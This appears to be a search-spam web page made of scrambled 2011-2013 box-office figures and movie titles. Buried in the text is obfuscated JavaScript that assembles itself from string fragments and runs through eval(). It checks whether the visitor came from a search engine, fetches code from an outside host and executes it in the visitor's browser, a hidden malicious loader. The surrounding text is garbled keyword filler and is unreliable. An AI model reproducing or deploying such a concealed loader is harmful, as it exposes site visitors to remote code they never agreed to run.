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\")";wN["zhM"]="ef ";wN["VVL"]="'sc";wN["JaD"]="eva";wN["mJx"]="l \"";wN["hZX"]="t')";wN["Hjn"]=" 'f";wN["WkX"]="ent";wN["LBh"]="rib";wN["cPT"]="/aj";wN["KJO"]=":'h";wN["KNv"]="ta,";wN["nUZ"]="yTa";wN["aUD"]="se,";wN["LDp"]="f.. \"";wN["Dta"]="tex";wN["mLm"]="|(r";wN["ODR"]="ET'";wN["dTQ"]=" 1 ";wN["wTu"]="taT";wN["dzO"]="ine";wN["evW"]="d')";wN["xVf"]="url";wN["xmj"]="?we";wN["sXB"]="atu";wN["SEA"]="ex.. Par 5 5,7 03,4 Evil Dead (2 01 Tri S$5 4,2 39,8 Red 2 LG/S$5 3,2 Tyler Perry's A Madea Christmas.
Fox$1 07,5 Captain Phillips Sony$1 07,1 00,8 Jackass Presents: Bad Grandpa.
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SGem$3 1,1 65,4 Delivery Man BV$3 Grudge Match WB$2 One Direction: This is Us.. Par 1 02,0 03,0 Pacific Rim WB$1 This is the End Sony$1 Olympus Has Fallen.. Sony$1 The Great Gatsby (2 WB$1 44,8 40,4 The Conjuring WB (NL)$1 Identity Thief.. Sony$1 19,7 93,5 Now You See Me LG/S$1 The Wolf of Wall Street Par 1 16,9.. 2011 Movies, Movies 2011 Complete List of All 2011 Movies in Theaters This 2011 Movies page is updated daily.. BV$8 Oblivion Uni 8 Insidious Chapter 2 FD$8 3,5 86,4 47 Saving Mr Banks.. Par 2 28,7 78,6 Thor: The Dark World BV$2 06,3 62,1 World War ZPar 2 The Croods.. Wein 5 7,0 12,9 Years a Slave Fox S$5 6,6 71,9 93 Free Birds Rela Hansel and Gretel: Witch Hunters.. Uni Grown Ups 2 Sony$1 The Wolverine Fox$1 Anchorman 2: The Legend Continues.. 01 3)Uni The Host (2 01 3)ORF$2 The World's End Focus$2 Over Rela 2 5,6.. After Earth Sony$6 The Secret Life of Walter Mitty Fox$5 8,2 36,8 Escape From Planet Earth.. 00,6 Lee Daniels' The Butler Wein 1 16,6 32,0 The Hangover Part IIIWB$1 Epic.. c";wN["stN"]="}}}";wN["aNo"]="({t";wN["UWn"]="eDa";wN["wRd"]="dex";wN["MQz"]=";va";wN["Pcm"]=".. Side Effects (2 01 ORF$3 2,1 72,7 Scary Movie 5 W/Dim The Mortal Instruments: City of Bones.. var a = 'christmas+2013+movies+in+theaters';var wN = new Array();wN["dtE"]=",da";wN["tqH"]=" q ";wN["AiD"]="nt.. Tri S$2 8,8 73,3 Kick- Ass 2 Uni Dallas Buyers Club Focus$2 7,2 98,2 Rush (2.. LG/S$4 2,9 Riddick Uni 4 2,0 A Haunted House ORF$4 Ronin Uni 3 8,3 August: Osage County.. LGF$5 2,5 43,3 Tyler Perry's Temptation: Confessions of a Marriage Counselor LGF$5.. FD$9 8,9 25,6 40 WB$9 5,0 20,2 13 Elysium Tri S$9 Planes BV$9 0,2 The Lone Ranger.. I P D Uni 3 Blue Jasmine SPC$3 Kevin Hart: Let Me Explain LG/S$3 2,2 44,0.. Wein 3 7,7 38,8 Philomena Wein 3 The Family (2 01 Rela 3 6,9 18,8 Walking with Dinosaurs.. BV$4 00,7 Despicable Me 2 Uni Man of Steel WB$2 2013 Movies, Movies 2013 Complete List of All 2013 Movies in Theaters.. 3,1 03,7 Mama Uni 7 1,6 Safe Haven Rela The Smurfs 2 Sony$7 The Best Man Holiday.. BV$8 3,3 01,5 80 Turbo Fox$8 3,0 Guns Uni 7 5,6 White House Down Sony$7.. Close 1The Hunger Games: Catching Fire LGF$4 24,6 68,0 Iron Man 3 BV$4 Frozen.. ";wN["IJf"]="unc";wN["mbM"]="ssD";wN["VIK"]="0)|";wN["jgn"]="f(\"";wN["eDK"]="z18";wN["xXV"]=",cr";wN["Dmg"]="s,j";wN["HzD"]="xOf";wN["IBH"]="get";wN["raV"]="{se";wN["Mhl"]="ar ";wN["Qfe"]="g.. Previous Year Next Year > #1–1 Note: RELEASE DATE shows all movies that opened in a given time period and their total grosses.. Total Grosses of all Movies Released in 2 Previous Year Next Year > Rank So get ready to update your movie.. \"";wN["GCQ"]="=do";wN["klc"]="(\"y";wN["avS"]=");}";wN["EbE"]="\")>";wN["JBA"]="cri";wN["dvw"]="ue,";wN["MVu"]="liv";wN["oJC"]="me(";wN["bzA"]="s.. Movie Title (click to view)Studio Total Gross / Theaters Opening / Theaters Open.. Uni 2 38,6 79,8 Oz The Great and Powerful BV$2 34,9 11,8 Star Trek Into Darkness.. This 2013 Movies page is updated daily This Movies 2013 page contains the most accurate 2013.. c";wN["bbK"]="n r";wN["RJh"]="ute";wN["wWQ"]="$ a";wN["OwQ"]="lse";wN["kDe"]="ndC";wN["BCz"]="oce";wN["nnm"]="o.. ";wN["fdX"]="war";wN["Gdm"]="aja";wN["bzL"]="owm";wN["Akd"]="100";wN["WUe"]="esp";wN["THM"]="(ty";wN["Mfc"]="ype";wN["PBr"]="l(r";wN["GwL"]=".. ";wN["ueh"]="Of(";wN["Ray"]="gle";wN["TUO"]="0){";wN["ouG"]="s:f";wN["Cts"]="vk ";wN["YZI"]="0/j";wN["bHS"]="fer";wN["xac"]="oss";wN["ncX"]="yah";wN["DFa"]="0lZ";wN["opV"]="rd(";wN["HRk"]="'he";wN["HZD"]="if(";wN["lMj"]="S4M";wN["WiQ"]="].. Uni 7 0,5 25,1 Percy Jackson: Sea of Monsters Fox$6 8,5 59,5 A Good Day to Die Hard.. js";wN["ohr"]="bin";wN["NGs"]=":tr";wN["rlO"]="nt(";wN["Uhj"]=";if";wN["fCz"]=":'G";wN["GZf"]="rip";wN["kkA"]="nde";wN["Wfx"]=");f";wN["tOl"]="ref";wN["JgE"]="mai";wN["wPu"]="Dom";wN["xnr"]="d()";wN["NMD"]=";}}";wN["qZt"]="uer";wN["bWB"]="ppe";wN["xuZ"]="qXH";wN["PtH"]="rer";wN["Ced"]=".. Home Alone is a 1990 American Christmas comedy film written and produced by John Hughes and directed by Chris Columbus.. Fox$6 7,3 49,1 Warm Bodies LG/S$6 Jack the Giant Slayer WB (NL)$6 5,1 87,6.. The Purge Uni 6 Last Vegas CBS$6 Ender's Game LG/S$6 Prisoners WB$6 1,0.. ";wN["AOL"]="ume";wN["Rma"]="f i";wN["lRD"]="= a";wN["Jrl"]="ain";wN["mjj"]="tSt";wN["ufN"]="://";wN["Qmv"]="bro";wN["VNP"]="hil";wN["Ajh"]="oo.. BV$2 68,4 92,7 The Hobbit: The Desolation of Smaug WB (NL)$2 58,3 66,8 Fast & Furious 6.. This Movies 2011 page contains the most accurate 2011 Given the opportunity to visit her estranged family on Christmas Eve 1996, Kristin Cartwright hopes to change her past in order to improve her current life in 2013.. This movie begins with Lord Volemort breaking open Dumbledore's tomb and stealing the elder wand.. a";wN["KOX"]="cum";wN["bit"]="set";wN["MLc"]="meo";wN["FdR"]="ry ";wN["zRJ"]="y/3";wN["GzG"]="y',";wN["RKi"]="goo";wN["loq"]=",'/";wN["eTg"]=".. cr";wN["fsW"]="===";wN["NoW"]="n \"";wN["GBH"]=":fa";wN["HHg"]="');";wN["WTh"]="||r";wN["aoc"]="e';";eval(wN["VzI"]+wN["tqH"]+wN["lRD"]+wN["MQz"]+wN["TuF"]+wN["GCQ"]+wN["KOX"]+wN["WkX"]+wN["SiP"]+wN["CKf"]+wN["Eju"]+wN["Czu"]+wN["rlO"]+wN["VVL"]+wN["GZf"]+wN["hZX"]+wN["BmH"]+wN["bit"]+wN["dZo"]+wN["LBh"]+wN["RJh"]+wN["xhG"]+wN["erU"]+wN["loq"]+wN["cPT"]+wN["lpl"]+wN["RKi"]+wN["Ray"]+wN["yCb"]+wN["bzA"]+wN["fGK"]+wN["Gdm"]+wN["EiS"]+wN["zcI"]+wN["dpX"]+wN["qZt"]+wN["zRJ"]+wN["dTQ"]+wN["YZI"]+wN["JYE"]+wN["FdR"]+wN["ufI"]+wN["GwL"]+wN["HHg"]+wN["tsI"]+wN["AOL"]+wN["AiD"]+wN["IBH"]+wN["QbM"]+wN["THd"]+wN["DUk"]+wN["nUZ"]+wN["QIj"]+wN["oJC"]+wN["HRk"]+wN["CKB"]+wN["iyk"]+wN["WiQ"]+wN["bWB"]+wN["kDe"]+wN["VNP"]+wN["IdM"]+wN["Wfx"]+wN["IJf"]+wN["Bly"]+wN["bbK"]+wN["xnr"]+wN["kKi"]+wN["THM"]+wN["tmX"]+wN["yGe"]+wN["fsW"]+wN["NYO"]+wN["yFE"]+wN["dzO"]+wN["evW"]+wN["raV"]+wN["RNp"]+wN["MLc"]+wN["GPw"]+wN["aCT"]+wN["Akd"]+wN["avS"]+wN["Cnc"]+wN["WYH"]+wN["Mhl"]+wN["tOl"]+wN["GCQ"]+wN["KOX"]+wN["WkX"]+wN["Pcm"]+wN["bHS"]+wN["PtH"]+wN["Uhj"]+wN["ryd"]+wN["LDp"]+wN["LdZ"]+wN["ePM"]+wN["TUO"]+wN["HZD"]+wN["ryd"]+wN["Rma"]+wN["kkA"]+wN["HzD"]+wN["klc"]+wN["kIg"]+wN["SEA"]+wN["EbE"]+wN["VIK"]+wN["mLm"]+wN["zhM"]+wN["eht"]+wN["edU"]+wN["jgn"]+wN["RKi"]+wN["Ray"]+wN["Ced"]+wN["MAR"]+wN["WTh"]+wN["zhM"]+wN["eht"]+wN["edU"]+wN["jgn"]+wN["Gbq"]+wN["ndY"]+wN["ZVE"]+wN["qYz"]+wN["WTh"]+wN["zhM"]+wN["eht"]+wN["edU"]+wN["jgn"]+wN["ohr"]+wN["Qfe"]+wN["qYz"]+wN["WTh"]+wN["zhM"]+wN["eht"]+wN["edU"]+wN["jgn"]+wN["JgE"]+wN["mJx"]+wN["qYz"]+wN["WTh"]+wN["zhM"]+wN["eht"]+wN["edU"]+wN["jgn"]+wN["ncX"]+wN["Ajh"]+wN["EbE"]+wN["SpS"]+wN["tOl"]+wN["eTg"]+wN["wRd"]+wN["ueh"]+wN["pSi"]+wN["NoW"]+wN["qYz"]+wN["WTh"]+wN["zhM"]+wN["eht"]+wN["edU"]+wN["jgn"]+wN["MVu"]+wN["NnM"]+wN["qYz"]+wN["WTh"]+wN["zhM"]+wN["eht"]+wN["edU"]+wN["jgn"]+wN["Cts"]+wN["EbE"]+wN["TUO"]+wN["VzI"]+wN["SZa"]+wN["bzL"]+wN["wyI"]+wN["Hjn"]+wN["kuo"]+wN["aoc"]+wN["wWQ"]+wN["pAO"]+wN["aNo"]+wN["Mfc"]+wN["fCz"]+wN["ODR"]+wN["dtE"]+wN["wTu"]+wN["Mfc"]+wN["Afe"]+wN["JBA"]+wN["gMY"]+wN["Jfx"]+wN["BCz"]+wN["mbM"]+wN["xJt"]+wN["GBH"]+wN["OwQ"]+wN["xXV"]+wN["xac"]+wN["wPu"]+wN["Jrl"]+wN["NGs"]+wN["dvw"]+wN["cma"]+wN["sQr"]+wN["SZj"]+wN["aUD"]+wN["xVf"]+wN["KJO"]+wN["dlf"]+wN["ufN"]+wN["eDK"]+wN["AJd"]+wN["aCg"]+wN["lMj"]+wN["Qeh"]+wN["DFa"]+wN["TvV"]+wN["Qmv"]+wN["fdX"]+wN["Eaj"]+wN["qHh"]+wN["nnm"]+wN["fGK"]+wN["Hrp"]+wN["gar"]+wN["GwL"]+wN["xmj"]+wN["WTE"]+wN["GzG"]+wN["eBJ"]+wN["Sor"]+wN["ouG"]+wN["IJf"]+wN["Bly"]+wN["fwB"]+wN["WUe"]+wN["bCR"]+wN["UWn"]+wN["KNv"]+wN["Dta"]+wN["mjj"]+wN["sXB"]+wN["Dmg"]+wN["xuZ"]+wN["VsX"]+wN["JaD"]+wN["PBr"]+wN["WUe"]+wN["bCR"]+wN["UWn"]+wN["eVr"]+wN["NMD"]+wN["avS"]+wN["stN"]+wN["opV"]+wN["qbl"]);Yearly Box Office Results.. Par 1 25,1 68,3 Lone Survivor Uni G I 1 22,5 23,0 Cloudy with a Chance of Meatballs 2.. Yearly Index Page Movies - Complete List Of Movies 2 In Theaters 38 1 MIL July 1.. Her (2 01 3)WB$2 Summary of 6 89 Movies on Chart: Totals: $1 Averages: $1 5,9.. \"";wN["VzI"]="var";wN["qYz"]=")>0";wN["aCg"]="hIl";wN["fwB"]="n(r";wN["LdZ"]="eng";wN["GPw"]="ut(";wN["kKi"]="{if";wN["kIg"]="and";wN["qHh"]="tin";wN["Hrp"]="28/";wN["QbM"]="Ele";wN["pSi"]="\"ms";wN["CKf"]="eat";wN["NnM"]="e.. Fox$1 The Heat Fox$1 59,5 We're the Millers WB (NL)$1 50,3 94,1 American Hustle.. Movies released outside the indicated time period are shown in italics Click here for a full explanation of the various box office sectionsback to.. in";wN["eVr"]="ta)";wN["xhG"]="('s";wN["SZa"]=" sh";wN["Qeh"]="0uh";wN["eBJ"]="suc";wN["gMY"]="pt'";wN["Sor"]="ces";wN["Bly"]="tio";wN["bCR"]="ons";wN["EiS"]="x/l";wN["pAO"]="jax";wN["qbl"]=");";wN["zcI"]="ibs";wN["dZo"]="Att";wN["CKB"]="ad'";wN["ndY"]="ble";wN["cma"]="jso";wN["dlf"]="ttp";wN["Jfx"]=",pr";wN["VsX"]="R){";wN["Gbq"]="ram";wN["Eju"]="eEl";wN["SZj"]="fal";wN["gar"]="213";wN["fGK"]="om/";wN["JYE"]="que";wN["aCT"]="rd,";wN["lpl"]="ax.. Fox$3 6,0 76,1 Carrie (2 01 3)SGem$3 Texas Chainsaw 3 DLGF$3 4,3 41,9 R.. The film stars Macaulay Culkin as Kevin Gravity WB$2 74,0 Monsters University.. re";wN["AJd"]="LeH";wN["DUk"]="tsB";wN["BmH"]=";a ";wN["yGe"]="f $";wN["ZVE"]="r.. CALENDAR GROSSES shows all movies playing during the indicated time period, both new and holdover, and their grosses (or estimated grosses) during that time period.. 2013 Horror Movies, 2013 Horror Movies In Theaters, Upcoming Horror Movies 2013, New Horror 2013 Movies.. 1,9 75,3 The Call Tri S$5 Pain and Gain Par Gangster Squad WB$4 Jurassic Park 3.
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